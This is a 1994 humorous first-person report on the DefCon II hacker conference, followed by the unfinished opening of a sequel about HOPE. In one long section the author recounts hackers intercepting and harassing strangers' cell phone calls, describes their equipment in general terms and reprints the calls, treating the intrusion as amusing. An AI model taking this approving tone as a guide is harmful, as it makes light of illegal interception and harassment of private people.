"I was bugged by the Feds." "So was I?" "What can we do about it." "Yeah, they listen in on my
phones, too. I can hear the clicks." Right.
As Mark so succinctly put it, "if the government wants to bug you, you'll never know. They're
that good.". That kind of shut up the dilettante paranoids in the group, albeit mumbling that they
just knew that they were the victim of one of the 900 or so court approved wire taps last year.
Right. I think Gail was right: some of you guys are too boring to be believed.
The afternoon edition of the Spot A Fed contest took us on the run. I actually succombed to their
enthusiasm and the lack of mybetter judgement and followed a group of 8 or 10 to unmask an
unmarked white van in the parking lot.
"It's the Feds." "How do you know?" "Oh, it's the Feds alright." "How do you know." "It's a
white van and the intelligence services use white vans." "What are you going to do?" "Bust 'em."
"Bust 'em for what?" "For being Feds."
This motley crew traipsed through the mile long casino, trodding upon the ugly tartan/paisley
carpets so obnoxiously loud a blind man could cry "Uncle!", into the Hall of Overpriced Shoppes
through the lobby and over to the parking garage. We had to have $100,000 of surveillance gear
in tow: (enough to detect the plant Pluto fart in b-flat), Radio receivers and eavesdropping
equipment were courtesy of my pal Mike Peros. The goal was, if this was a Fed van, we could
hear it. I don't think so, but I go for the ride and a few minutes of reprieve away from the
conference hall.
As we near, the excitement grows among the more paranoid who are trying to instill their own
mental foibles into their companions and sheer terror in normal old Vegas visitors who have no
idea what they've walked into.
Feds? Not. Surrepticious radio transmissions? Just hotel security tracking the movements of 8 or
10 paranoids (and one writer with nothing else todo for a half hour) into a parking garage which
has more cameras than NBC. Feds? Of course not. Don't be ridiculous.
* * * * *
To say nothing worthwhile occurred until 11PM that evening would be lying, but this thing, this
DefCon II thing, was turning into what I would have called 25 years ago, a Love-In. The
participants were giddy from the event, the camaraderie, the $1 Heinekens and the hacking. The
Sahara was actually pretty good about it. Jeff got the conference space for free because he
guaranteed that at least 100 hotel rooms would be booked by "computer enthusiasts coming to a
small computer conference." Little did the hotel know that half the crowd was too young to
drink, to broke to gamble, and conspicuous enough to ward off legitimate clients. But a deal's a
deal.
The hotel operators went out of their way and allegedly gave the hackers permission to hack
through the PBX in order to provide a SLPP connection.
"Just put it back the way you found it when you're done," was the hotel's only and quite
reasonable request.
In my day an equivalent event producing an equivalent social non- drug induced high would have
been achieved by tossing a Frisbee to Grace Slick (Lead singer Jefferson Airplane) and have her
throw it back. We didn't have the kind of technology that today's rebellious age has. We had the
Beatles and Jimi Hendrix, safe sex (kinda), safe drugs (well, maybe a little safer) and a cause. But
no technology to speak of.
When I was on the publishing staff of the New York City Free Press in 1968/9 we wrote our anti-
establishment diatribes by hand. By hand! And then we went down to a dark office late at night
to use their typesetting gear when it was idle. It took no more than a blushing glance around the
room to realize that we impressionable teens were publishing our political extremisms on
equipment courtesy of Al Goldstein and Screw magazine. Now that was an education.
DefCon II was a Love-In, technology and all.
Come 11PM yet another speaker canceled and I offered to chat to the crowd for a half hour or so
on Van Eck radiation; the emissions from CRT's that make video screens readable from a
distance. Now this wasn't a fill in at 5PM or anything. Sessions reconvened at 11PM and I spoke
to a full audience who were there to get a midnight lesson in cellular hacking.
Most above ground types still believe that hacking is an acne- faced teenager, sucking on Jolt
Cola, wolfing down pepperoni pizza and causing Corporate America no end of grief. To a certain
extent some of this is true. But hacking is so much more.
As Rop Gongrijjp, editor of Hacktic once told me, "hacking is disrespect of technology." It's
going the extra mile to find out how things work. Many of the older hackers, those in their early
20's and older, are migrating from the conventional dial-em-up and break-in hacking image to the
fine art of cellular hacking. How do these things work? What are the frequencies? How can I
customize my phone? How many channels can I scan? The possibilities are endless as I soon
learned.
Jim and Bill (fake names) asked if I wanted to see a great demo. Sure! No names, they said. OK.
No problem. In one of the several thousand hotel rooms at the Sahara was a pile of equipment to
make an under budgedted FBI surveillance team insanely jeaous. There in the middle of the
ridiculously filthy room that no doubt caused the maid to shudder, sat a log periodic antenna
poised atop a strong and highly adjustable photographic-style tripod. Feeding the antenna was a
hunk of coax attached to a cell phone's antenna jack.
OK, so that's that? Free cell calls? No, much more.
A second cell phone/scanner, an Oki 900 was modified and connected to a laptop computer.
(This was the exact modification being discussed downstairs) Custom software that was freely
distributed around DefCon scanned the data from the Oki and displayed the scanning activity. A
pair of speakers then audibly broadcast the specific conversation. And in Vegas, you can imagine
what was going over the open airwaves!
A half dozen 'kids' sat around enthralled, each begging for his turn to, as Jim put it, "harass
cellular users. Ppure and simple. Harassment. Stomp on the son of a bitch," he laughed, joined in
by the others.
When a 'good' conversation was detected, they entered the channel into the broadcasting cell
phone and spoke. And talk they did. Essentially they turned 'private' conversations into wide-
band free-for-alls. If they spoke for only a few seconds one or both of the parties could hear what
was being said. If they talked for too long, the overpowering signal from the antenna would
literally wipe out the chat: the cell switch reacted with an internal signal to shut down. Stomping,
they called it.
For those on the receiving end of the harassment, it must have sounded like the overbearing voice
of God telling Noah how to build the Ark.
"Noah?"
"Who dat?
"Noah?"
"Who is that?"
What terror lurks in the minds of boys . . .
For those old enough to remember, stomping is no more a stunt than putting a 500 watt linear
power amplifier on a CB radio and blasting nearby CB's to kingdom come. The truckers used to
do it to 4-wheelers. When the police began monitoring CB channels "to protect and serve" they
became the target of CB stomping. So what else is new?
I gotta give it to them: these characters designed and built the software, modified the phones and
put it all together and it works! Not bad on a $3 allowance and a 10th grade education. Now, I
guess what they did may have been sort of illegal, or at least highly unethical and definitely, not
nice. But I have to admit, some of what I witnessed was very, very, funny. I'm not advocating this
kind of activity, but much like Candid Camera broke in to people's lives to capture their reactions,
cellular hacking is similarly amusing. The hacker/phreaks particularly enjoyed breaking in on
fighting couples. (I counted six impending divorces.) Almost without exception the man was in a
car and the lady was at a fixed location; presumably, home.
Him: "Where the hell have you been."
Her: "Nowhere." Him: "Bullshit.
Her: "Really honey . . ." Defensively.
Him: "Who's with you?" Intense anger.
Hacker: "Don't believe her. She's a whore."
Him: "What was that?"
Her: "What?"
"That voice."
"What voice?"
Hacker: "Me you asshole. Can't you see she's playing you for a fool."
"I know she is." He agrees.
"What's that honey?"
"I know he's there with you."
"Who?" Incredulous.
"Him . . . whoever you're fucking when I'm at work."
Hacker: "Yeah, it's me."
"Shit! Who the fuck is there?"
"No one!"
"I can hear him, he's there. You're both making fun of me . . ."
Hacker: "She's laughing at you, man."
"No shit. Who the fuck are you?"
Hacker: "The guy who takes care of her when you can't, asshole."
"That's it." Click.
Drug dealers aren't immune to these antics.
"Where's the meet?"
"By the 7/11 on Tropicana."
"You got it?"
"You got the cash?"
"Yeah, dude."
"Be sure you do."
Hacker: "He doesn't have the cash my man. He's gonna rip you off."
"What?" "What?" Both sides heard the intruder's voice. "Who is that?"
"What's that about a rip-off?"
"This ain't no rip-off man."
Hacker: "Yes it is. Tell 'em the truth. You gonna take his drugs and shoot his ass. Right? Tell
'em."
"You gonna rip me off?"
"No, man!"
"Your homeboy says you gonna try and rip me off?"
"What home boy?"
Hacker: "Me, you bozo drug freak. Don't you know that shit can kill you?"
Click.
Good samaritanism pays off upon occasion.
"Honey, hurry up."
"I'm on the freeway. I'm coming."
Hacker: "He's late. Let's save her ass."
"What was that?" "What did you say honey?"
"He said he was going to save your ass." "Who did?"
"The guy on the radio." (Technical ignorance abounds.)
Hacker: "Me. You're late and she's scared so we're gonna beat you there and make her safe."
"Who the hell is that?" "Who?" "The guy with you?" "There's no one here." "He says he's gonna
beat me there and pick you up."
Hacker: "Damn right we are."
"Hey, this is cool. Who's there?"
Hacker: "Cyber Christ talking to you from Silicon Heaven."
"No shit. Really?"
Hacker: "Yeah, (choke, choke,) really."
"What's happening, honey."
"I don't know, for sure. He says it's God."
"God!?!?"
Hacker: "Close enough. Listen, you sound alright. Go get your woman, man Keep her safe."
"No problem. Uh, thanks."
Click.
Around 4AM, I guess it was, the hacker/phreaks definitely helped out law enforcement. One end
of the conversation was coming from inside a hotel, maybe even the Sahara. The other from
another cell phone, most likely in the lobby.
"What do you look like?"
"I'm five foot nine, thinning brown hair and 180 pounds I wear round glasses and . ."
"I get the idea. Where are you now?"
"I'm coming down the elevator now. What do you look like?"
"I'm six foot one in my heels, have long blond spiked hair and black fishnet stockings."
Hacker: "Don't go man. It's a bust."
"What?" he said.
Hacker: "Don't go, it's a bust. You don't want your name in the papers, do ya?"
"What the fuck?" she yelled.
"There's a guy who says this is a bust?"
"Bust? What bust?"
Hacker: "That's the clue, man. She's denying it. Of course it's a bust. Is it worth a night in jail to
not get laid?"
"Shit." He whispers not too quietly to another male companion. "There's some guy on the phone
who says it's bust. What should we do."
Hacker: "I'm telling you man, don't go,"
"This ain't worth it. I'm going back upstairs."
Click.
A couple of hours later the same hooker was overheard talking to one of her work mates.
"Then this asshole says it's a bust. Cost me $300 in lost business, shit."
"You, too? Same shit been going on all night long. What the fuck?"
Wow. And it seems like only this morning that my toilet exploded.
* * * * *
So what's a perfectly groomed and slightly rotund 50-something convicted methamphetamine
dealer doing at DefCon II with hundreds of impressionable teenagers? You might well ask.
So I'll tell you.
Sitting in yet another Saharan hell-hole of a room they unabashedly market for $55 per night I
encountered hackers #1 through #4 and this . . . I immediately thought, elderly gent. He said
nothing and neither did I, thinking that he might have been an over aged chaperone for delinquent
teens or perhaps even an understanding Fed. But the gallon jugs of whiskey was depleting itself
right before my eyes, as if a straw from Heaven sucked the manna from its innards. Actually, it
was Bootleg.
Not bootleg liquor, mind you, but Bootleg the felonious con from Oregon. Apparently he got
busted 'cause speed is and was against the law, and crank is not exactly the drug choice of maiden
aunts nor school marms. "I've been a hacker longer than some of these kids have been alive. It all
started back in . . ." and Mike "Bootleg" Beketic commenced on the first of hundreds of war-
story jail house tales to entertain him and us. Bootleg loves a good story.
"Jail ain't so bad," he bragged with a huge whiskey smile. "No one fucked with me. You gotta
make friends early on. Then it's OK." Good advice, I guess. "On parole I got slammed with a
year for piss that didn't pass." Gotta be clean, my man. Stay away from that shit. It'll kill you
and your teeth will rot.
Bootleg handed me form PROB-37, (Rev. 1/94) from the United States District Court, Federal
Probation System. Grins from ear to ear. A badge of honor for villains, thieves, and scoundrels.
Sounds like they need their own union.
This was the official "Permission To Travel" form dated June 16, 1994 which gave Bootleg the
legal right to travel from Oregon to Las Vegas in the dead of the summer to attend a "computer
convention." The flight times were specific as were the conditions of his freedom. He had to
inform the local cops that he was in town. In case any crimes occurred throughout the city of Las
Vegas during his sojourn, he was an easily identifiable suspect.
While he downed another Jack and coke I found out what Bootleg was really doing. Despite the
fact that the "Federal Keep Track of a Crook Travel Form" said, "you are prohibited from
advertising or selling your DMV CD," the paranoia ran rampant through the minds of prison
bureaucracy was actually in this case quite correctly concerned.
"What's a DMV CD?"
"I'm glad you asked." I was set up. The edict said he couldn't sell or advertise, but there was no
provision stating that he couldn't answer questions from an inquiring mind.
Bootleg handed me a CD ROM:
Bootleg Presents:
DMV
- Over 2 Million Oregon Drivers License Records
- Over 3 Million Oregon License Plate Records
The inside jacket clearly stated that this information was not to be used by any creatively nefarious
types for any sort of personal Information Warfare tactics. It warns,
Do not use this CD to:
- Make phony Licenses
- Make phony Titles
- Obtain phony I.D.
- Harass Politicians, Cops or Journalists
- Stalk Celebrities
- Get ME in trouble <G>
I can come up with at least 1001 other uses for this collection of information that the Oregon
authorities are none too happy about. The ones Bootleg outlined never came into my mind.
(Heh!) Bootleg acquired the information legally. State officials were kind enough to violate the
electronic souls of its citizens by sending Bootleg their driver's information magnetically
emblazoned on a 3600 foot long piece of 9 track acetate. Now they want to change the law to
reflect "heart felt concern for the privacy of their citizens." Get a clue, or if none's available, buy
one from Vanna.
Bootleg is moving onto the next 47 states (California and New York don't permit this kind of
shenanigans) shortly to make sure that everyone has equal access. Hacking? Of course. Bootleg
effectively hacked the Oregon DMV with their blessing and tax payer paid-for assistance.
Time to go back to my room while Bootleg and friends spent an evening of apparently
unsuccessful whoring around the Strip and Glitter Gulch.
A good time was had by all.
* * * * *
Jeff Moss opened the Sunday morning session with an ominous sermon.
"You'll notice that the wet bar is missing from the rear?" It had been their yetserday. Everyone
turns around to look. "I gotta pay for the damage . . . " Jeff was not a happy camper. "They
have my credit card number and it's almost full. So cool it!" But the show must go on and we had
more to learn.
Next. Anonymous mailers on the net? Forget about it. No such thing. Anonymous remailers,
even if they are in Norway or Finland or some such other country where American information
contraband such as child pornography is legal, are only as safe and secure as the people who run it
"The FBI can go over any time they want and look up who you are and what kinds of stuff you
swallow down your digital throat," one speaker announced. Of course that's ridiculous. The FBI
would have to call in the Boy Scouts or Russian Mafia for that kind of operation, but we all knew
that anyway. A slight slip of the ad lib tongue. No harm done.
I didn't know, until this Sunday, that there were actually real live versions of "Turn Up The
Volume" running rampant across the country, impinging their commercial-free low power radio
broadcasts into an electromagnetic spectrum owned and operated by the Federal Communications
Commission. And, as to be expected, the FCC is trying to put this relatively harmless stations out
of business along with Howard Stern and Don Imus. One would think that WABC or KLAC or
any other major market stations would little care if a podunk 20 watt radio station was squeezing
in between assigned frequencies. And they probably shouldn't. But, as we learned, the Military
lent an innocent hand.
In support of the hobbies of servicemen, a local San Francisco base commander gave approval for
a group of soldiers to establish a small, low power radio station for the base. Good for morale,
keep the men out of the bars: you know the bit.
But the ballistic missiles went off when the nation's premier rating service, Arbitron, listed
KFREE as a top local station in the San Francisco market.
"What station KFREE?" "Who the hell are they?" "What the fuck?"
Needless to say, KFREE was costing the legitimate radio stations money because advertising rates
are based upon the number of listeners not up and peeing during commercials. Since KFREE was
ad-free, no contest. Arbitron assumes the rating to relect the existence of a real station - the
numbers are there - and the local stations call the FCC and the FCC calls the base and as quick as
you can scream, "Feds suck!" KFREE is off the air.
Stomp.
I was scheduled to speak today, but with the schedule seemingly slipping forward and backward
at random haphazard intervals, there was no telling when what would occur. Mark Ludwig, of
Virus Writing Contest fame and author of the much touted "Little Black Book of Computer
Viruses" Virus gave a less then impassioned speech about the evils of government.
"I know most of you don't have any assets other than your computer," Ludwig said to the poverty
stricken masses of DefCon II. "But you will, and you want to make sure the government doesn't
come crashing down around you whenever they want. They can and will take your life away if it
suits them. There is no fourth amendment. Most search and seizures are illegal." And so it went.
"Put your money off shore, kids," said Dr. Ludwig the theoretical physicist. "Find a good friendly
country will flexible banking laws and the Feds can't get you."
"And when the Fed do come for you, make sure that your entire life is on your computer. Rip up
the papers after you scan them in. Your all-electronic life cannot be penetrated - especially if you
get a case of the forgets. 'Oops, I forgot my password. Oops! I forgot my encryption key. Oops!
I forgot my name.'"
"Even your VISA and Mastercard accounts should be from overseas. Keep it out of the US and
you'll be all the better for it." For those interested in such alternative, Ludwig recommends that
you call Mark Nestman: of LPP Ltd. at 800-528-0559 or 702-885-2509. Tell him you want to
move your millions of rubbles and dollars and Cyber-credits overseas for safe keeping because the
Byzantine Police are at the front door as you speak. Order pamphlet 103.
These are the defensive measures we can take protect ourselves against the emerging Police State.
But offensive action is also called for, he says. "Help Phil Zimmerman. Send him money for his
defense. Then, laugh at the Feds!" Ha ha ha ha. Haha. Hahahahahaha. Ha!
."When they come to the door, just laugh at them." Haha. Hahaha. Haha. "No matter what they
do, laugh at them." Hahahahaha. Enough of that, please. If I laugh at 6 husky beer-bellied
Cyber-cops who have an arsenal of handguns pointed at my head, they might as well send me to
the Group W bench to commiserate with Arlo Guthrie. Peeing would come before laughing. But
then again, I'm no longer a grunged out 20 year old who can laugh in the face of the Grim
Reaper. "Yes, ossifer, sir. I'm a cyber- crook. I ain't laughing at you in your face, ossifer, sir . .
." I panic easily. Kissing ass well comes from a life long success of quid pro quo'ing my way
from situation to situation.
"And, now," Master Mark announced, "on to the results and awards for the Annual Virus Writing
contest." Ludwig seemed suddenly depressed. "Unfortunately, we only got one legitimate entry."
One entry? The media plastered his contest across the media- waves and the National Computer
Security Association was planning a tactical nuclear response. One entry? What kind of
subversives have 20 year olds turned into anyway? In my day (Yeah, I'm old enough to use that
phrase) if we called for a political demonstration thousands would pile through the subway
turnstiles to meet a phalanx of well armed police appropriately attired in riot gear. One entry?
Come on X-Generation, you can do better than that? No wonder the world's going to shit. Don't
have enough trouble from the young-uns. Sheeeeeeesssh!
Mark Ludwig's politically incorrect virus writing contest may have been a PR success but it was a
business abortion. One entry. Shit. At the NCSA meeting in Washington, rivaling factions battled
over how we as an association should respond.
"Hang the bastard." "He's what's wrong with world." "Put him in a county jail with Billy-Bob,
Jimmy-Ray and Bubba for a week and they'll be able to squeeze him out between the bars."
C'mon you fools! Ignore him! Ignore him! If you don't like what he has to say don't egg him on.
Ignore him. You want to do what the Feds did to poor Phil Zimmerman and make him a folk
hero? Turn a non-event into the lead for the evening news is not the way to make something go
away. I loudly advocated that he be treated as a non-entity if the goal was reduction to obscurity.
I was right.
Super-high priced PR and lobby firms had prepared presentation to wage an all-out attack on
Ludwig and his contest. I bet! And who was going to pay for this? Peter Tippitt of Semantech
ponied up what I believe amounted to $7,000 to get the pot going. No one else made a firm
offer. Can't blame them cause it would have been no more effective than taking out an ad in USA
proclaiming that evil is bad. The PR firm would have made their fees, the event would have made
even more news and Ludwig would certainly have had to make a judgement and choose from
more than one entry.
But oddly enough, the one entry did not win.
The winner of the Annual Virus Writing Contest was no less than Bob Bales, Executive Director
of the NCSA. Not that Bob wrote a program, but is he had, it would be called either Don
Quixote or Paranoia, and it would be of the human brain attacking Meme type. The virus is a
software equivalent of Prozac to alleviate the suffering in middle-aged males who have no
purpose in life other than virus busting.
"Is Winn Schwartau here?" Mark asked the audience.
I was there. "Yo!"
"Would you tell Bob that he's won a plaque, and a $100 check and a full year subscription to the
Computer Virus Developments Quarterly." I'm the technology advisor to the NCSA so it was
natural request.
I told Bob about his 15 minutes of fame at DefCon to which he roared in laughter. "Good! Then
I won't have to subscribe myself."
I spoke next. Jeff introduced me by saying, "Winn says he doesn't want to speak to an empty
room so he's gonna talk now." Some introduction. But, what a great audience! Better than most
of the security above-ground starched sphincter tight suit and tie conference audiences I normally
get. But then again, I get paid handsomely to address legitimate audiences where I have to be
politically correct. At DefCon, insulting people was the last thing I worried about. It was what I
focused on, onstage and off.
"Hey, kid. Did you ever land Zimmerman in bed?"
"You, you, er . . ."
"C'mon kid. Give me your best shot."
"Your mother . . ." A crowd gathered to see what kind of repartee this little schnook could come
up with. "Your mother .. ." C'mon kid. You got it in you. C'mon. "You, she is a . . . uh, . . .
mother . . ." and he finally skulked away in sheer embarrassment. Poor kid. When he went to the
men's room, men walked out. Poor kid. I don't think he ever figured out it was all a put on.
The audience got it, though. Rather than go over what I rambled about for an hour, here comes a
blatant plug: Go buy my new book "Information Warfare: Chaos on the Electronic
Superhighway." That'll sum it up real nice and neat. But what a great audience. Thanks.
Little did I know, though, that I was also on trial.
John Markoff of the New York Times was the first to ask, and then a couple of buddies asked and
then a lady asked during the Q&A portion of my ad hoc ad lib speech. "How come you did it?"
Did what? "How come you flamed Lenny DeCicco?"
It turns out that someone adapted my electronic identity and logged on to the WELL in Sausalito,
CA and proceeded to post a deep flame against Lenny. Among other none-too-subtle aspersions,
'my' posting accused Lenny of a whole string of crimes of Information Warfare and even out and
out theft.
Except, it wasn't me. I answered the lady's question with, "It wasn't me, I don't know Lenny and I
don't have an account on the WELL." That satisfied everyone except for me. What happened
and why? It seems that Lenny's former partner in crime Most- Wanted on the lam federal fugitive
computer hacker Kevin Mitnick actually wrote and signed the letter with his initials. Or someone
was spoofing him and me at the same time. But why? And why me?
It took a couple of days after arriving home from DefCon to learn after extensive conversations
with the WELL that my erased account from almost two years ago and then re-erased on June 20
of this year was accidentally turned back on by some mysterious administrative process that I
cannot claim to fathom. OK, that's what they said.
But perhaps most interesting of the entire Getting Spoofed incident was a single comment that Pei
Chen, sysop of the WELL said to me while I complained about how such an awful anti-social
attack was clearly reprehensible. Oh, it's simple, she said.
"We have no security." Whooaaaahhh! The WELL? No security? I love it. I absolutely love it.
Major service provider, no security. Go get 'em cowboy.
The only other speaker I wanted to see was Peter Beruk, chief litigator for the Software
Publisher's Association. This is the Big Software Company sponsored organization which
attempts to privately interdict illegal software distribution as a prelude for both civil and criminal
prosecutions. And with this group of digital anarchists, no less.
The SPA scrounges around 1600 private BBS's to see who's making illicit copies of Microsoft
Word or Quattro For Weanies or Bulgarian for Bimbos or other legitimate software that the
publishers would rather receive their due income from then being stolen.
"Which boards are you on?"
"That would be telling." Big grin and laughs.
"Is your BBS secure?" A challenge in the making.
"Sure is."
"Is that an offer to see if we can break in?" Challenge made.
"Ahem, cough, cough." Challenge denied.
"What name do you use on the boards?" Idiot question that deserves an idiot answer.
"Fred." Laughs.
"You mean you have a full time guy to download software from boards to see if it's legal or not?"
"Yup."
"So, you pay people to commit felonies?" Astutely stupid question.
"We have permission."
"Why should we have to pay rip-off corporations too much money to use really shitty software?"
"So don't buy it."
"We don't. It's so shitty that it's barely worth stealing."
"So don't steal it."
"Just want to check it out, dude."
"Scum sucking imperialists are making all of the money. The software designers are getting
ripped off by the big software bureaucracies. Power to the people." Every generation goes
through this naively innocent berating of capitalism. It doesn't make them Communists (in 1950 it
did), just not full fledged capitalist pigs themselves yet. Soon come. Vis a vis Ludwig's comment
on the asset-deprived audience. Soon come, man.
"We go after BBS's that store illegal software."
"So you're gonna put Compuserve in jail?" Big, big applause.
Despite the openly verbal animosity between the free-ware believers and the Chief Software Cop,
the spirited and entertaining disagreements maintained a healthy good natured tone that well
exceed Peter's time limit, as DefCon II was coming to a close.
It was time for one more stand up comedy attempt by a long haired bandanna wearing
hippie/hacker/phreak who was not quite up to the job.
"OK, guys. We've had some fun at the Feds expense. They're people, too. So, from now on, it's
Hug a Fed. Go on, find a fed and go up to him or her and big them a great big bear hug full of
love." The Feds that had been busted were gone. The ones still successfully undercover weren't
about to blow it for quick feel from a horny teenager.
Next. The Cliff Stoll doll with an assortment of accessory yo- yos was a popular item. It was
thrown pell-mell into the crowds who leapt at it with a vengeance like a baseball bleachers section
awaiting the 61st home run.
"There used to be a Wife of Cliff Stoll doll, but no one's seen it in two years." Cliff is strange. I
don't know if he's that strange, but it was a funny bit.
"Then we have the LoD/MoD action figure set starring Erik Bloodaxe and Phiber Optik." GI Joe
action set gone underground. Corny, but appreciated as hundreds of bodies dove to catch the
plastic relics tossed from the stage.
If anything, an anti-climatic end to an otherwise highly informative and educational conference. I
can hardly wait till next year when, after word gets out, DefCon III will be attended by thousands
of hackers and cops and narks who will try to replay the Summer of Cyber-Love '94 for a sequel.
* * * * *
More than anything I wanted to get away from the Sahara. Away from its nauseatingly chromatic
carpets, it's hundreds of surveillance cameras, and most of all, away from its exploding toilets.
We decided to play, and play we did at the new Luxor Hotel which is an amazing pyramid with
4000+ rooms. There are no elevators as in a pyramid 'going up' is kind of useless, so Inclinators
take passengers up the 30 some odd floors to hallways which ring around the impossibly huge
hollowed out pyramid shaped atrium.
This was play land. And for three hours we played and played and went to dumb shows that
attract mid-western mamas from Benign, Ohio, alighting in Vegas for their annual RV
pilgrimage. But we went and enjoyed none the less.
The "Live TV" show was anything but live except for lovely Susan who hosted us into the ersatz
TV station. Her job is to look pretty, sound pretty and warm up the crowd for an over budget,
overproduced schmaltz driven video projection that was to make us all feel like we were on stage
with Dave. Letterman, that is. The effect does not work. But we enjoyed ourselves, anyway.
"Everyone here on vacation?"
"No!" I yelled out. Poor Susan was stunned. No? Why else would you be here?
"What are you doing?" The TV audience of 500 was looking our way. Between the five of us we
had a million dollars (give or take) of electronic wizardry stuffed around us, beneath us and in our
laps.
"Working." Gee, I'm quick.
"What do you do?" Susan asked with a straight face. I bet she expected something like gas
pumper, or nocturnal mortuary fornicator or 7/11 clerk.
"We're hacking for Jesus. This is Cyber Christ!" I said pointing at Erik Bloodaxe.
Silence. Dead silence again. Sleep with Phil Zimmerman silence. Except for us. We giggled like
school boys. Psyche.
"Ah, . . . that's nice." That was all she could come up with: That's nice. So much for ad libbing or
deviating from the script. But the TV audience enjoyed it. A whole lot. They finally figured out
it was put on. Not every one from the Mid- West is as stupid as they all pretend to be.
Then it was time to get sick. VR rides do me in, but not to be publicly humiliated by my 20-
something cohorts (and Mike Peros with whom I had to travel yet another 2000 miles that night) I
jumped right into an F-14 simulator which rotated 360 degrees on two gimbals for an infinite
variety of nauseousness.
"Oh, shit!" I yelled as I propelled myself forward and around and sideways with sufficient g-force
to disgorge even the most delectable meal. "Oh, shit." I had reversed the throttle and was now
spinning end over end backwards. My inner ear was getting my stomach sick. "Oh, shit." Out of
the corner of my eyes my four pals were doubled over in laughter. Had I barfed yet and not
known it? God, I hope not. "Oh, shit." I came to a dead standstill, the video screen showed me
plummeting to earth at escape velocity and I pushed the throttle forward as roughly as I could.
An innate survival instinct came in to play. "Oh, shit!" The virtual aircraft carrier came into sight
and after almost 2 minutes of high speed rotating revulsion, I was expected to land this spinning
F-14 on a thimble in the ocean. Right. I tried, and damned if I didn't make it. I have no idea
how, but I got an extra 34,000 points for a safe landing. 120 seconds. Ding. Time's up.
I got out of the simulator and spilled right onto the floor; one 42 year old pile of humanity who
had navigated nausea but whose balance was totally beyond repair. "Could anyone hear me?" I
asked from my knees.
"They were selling tickets."
"Do I get my money back?"
Onto the VR race cars. I really thought I'd throw up to the amusement of a thousand onlookers.
Hacking then phreaking then flying and now driving. I put the pedal to the metal and crashed.
The huge video display has me tipping end over end and the screen is shaking and the car I'm
driving is shuddering violently but my brain can't compute it all. I'm gonna wretch, I just know it.
But I keep on driving, decidedly last against people who haven't been handicapped with an inner
ear so sensitive I get dizzy when I watch a 5" black and white TV.
We tilted out of there and alas, it was time to find a 200,000 pound of metal to glide me home. It
was damn good thing I hadn't eaten before VR Land, but I wolfed down $3 hot dogs at the
airport knowing full well that whatever they served on the plane would be a thousand times
worse. So Mike and I munched, leaving Cyber Christ and friends to battle the press and the stars
at the opening of Planet Hollywood at Caesar's Palace.
And then an unexpected surprise. Lisa and friend; our first class objects of flirtation from the
outbound trip which seemed like a month ago, appeared. But we were all so wiped out that a
continent of innuendo turned into a series of short cat naps. We got a few flirts in, but nothing to
write home about. Red Eye flights are just not what they're cracked up to be.
As I crawled into bed at something like 7AM Eastern, my wife awoke enough to ask the perennial
wife question. "What did you do all weekend?" I, in turn, gave her the usual husbandly response.
"Oh, nothing. Good night, Gracie."
* * * * *
(C) 1994 Winn Schwartau
Winn Schwartau is an information security consultant, lecturer and, obviously, a writer. Please go
buy his new book: "Information Warfare: Chaos on the Electronic Superhighway." Available at
book stores everywhere. Winn can be reached at: Voice: 813.393.6600 or E-mail:
P00506@Psilink.com
Notice: This article is free, and the author encourages responsible widespread electronic
distribution of the document in full, not piecemeal. No fees may be charged for its use. For hard
copy print rights, please contact the author and I'll make you an offer you can't refuse.
@HWA
41.0 Cyber-Christ takes a byte out of the big apple, Winn Schwartau at HOPE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cyber Christ Bites The Big Apple
HOPE - Hackers On Planet Earth,
New York City - August 13-14, 1994
(C) 1994 Winn Schwartau
by Winn Schwartau
(This is Part II of the ongoing Cyber Christ series. Part I, "Cyber Christ Meets Lady Luck"
DefCon II, Las Vegas, July 22-24, 1994 is available all over the 'Net.)
Las Vegas is a miserable place, and with a nasty cold no less; it took me three weeks of
inhaling salt water and sand at the beach to finally dry up the post nasal drip after my jaunt to
DefCon II. My ears returned to normal so that I no longer had to answer every question with
an old Jewish man's "Eh?" while fondling my lobes for better reception.
New York had to be better.
Emmanuel Goldstein -aka Eric Corely - or is it the other way around? is the host of HOPE,
Hackers on Planet Earth, a celebration of his successfully publishing 2600 - The Hackers
Quarterly for ten years without getting jailed, shot or worse. For as Congressman Ed Markey
said to Eric/Emmanuel in a Congressional hearing last year, and I paraphrase, 2600 is no more
than a handbook for hacking (comparable obviously to a terrorist handbook for blowing up the
World Trade Center) for which Eric/Emmanuel should be properly vilified, countenanced and
then drawn and quartered on Letterman's Stupid Pet Tricks.
Ed and Eric/Emmanuel obviously have little room for negotiation and I frankly enjoyed
watching their Congressional movie where communication was at a virtual standstill: and
neither side understood the viewpoints or positions of the other.
But Ed is from Baaahhhsten, and Eric/Emmanuel is from New York, and HOPE will take place
in the Hotel Filthadelphia, straight across the street from Pennsylvania Station in beautiful
downtown fast-food-before-they-mug-you 34th street, right around the corner from clean-the-
streets-its-Thanksgiving Herald Square. Geography notwithstanding, HOPE promised to be a
more iconoclastic gathering than that of DefCon II.
First off, to set the record straight, I am a New Yorker. No matter that I escaped in 1981 for
the sunny beaches of California for 7 years, and then moved to the Great State of the Legally
Stupid for four more (Tennessee); no matter that I now live on the Gulf Coast of Florida where
the water temperature never dips below a chilly 98 degrees; I am and always will be a New
Yorker.
It took me the better part of a decade of living away from New York to come to that
undeniable and inescapable conclusion: Once a New Yorker, always a New Yorker. Not that
that makes my wife any the happier.
"You are so rude. You love to argue. Confrontation is your middle name." Yeah, so what's
your point?
You see, for a true New Yorker these aren't insults to be re- regurgitated at the mental moron
who attempts to combat us in a battle of wits yet enters the ring unarmed; these are mere tru-
isms as seen by someone who views the world in black and white, not black, white and New
York.
Case in point.
I used to commute into Manhattan from the Westchester County suburb of Ossining where I
lived 47 feet from the walls of Sing Sing prison (no shit!). Overlooking the wide expanse of
the Hudson River from my aerie several hundred feet above, the only disquieting aspect of that
location were the enormously deafening thunderclaps which resounded a hundred and one
times between the cliffs on either side of the river. Then there was the occasional escapee-
alarm from the prison. .
So, it was my daily New York regimen to take the 8:15 into the city. If the train's on time I'll
get to work by nine . . .
Grand Central Station - the grand old landmark thankfully saved by the late Jackie O. - is the
nexus for a few hundred million commuters who congregate in New York Shitty for no other
reason that to collect a paycheck to afford blood pressure medicine.
You have to understand that New York is different. Imagine, picture in your mind: nothing is
so endearing as to watch thousands of briefcase carrying suits scrambling like ants in a Gary
Larson cartoon for the nearest taxi, all the while greeting their neighbors with the prototypical
New York G'day!
With both fists high in the air, middle fingers locked into erect prominence, a cacophonous
chorus of "Good Fucking Morning" brightens the day of a true New Yorker. His bloodshot
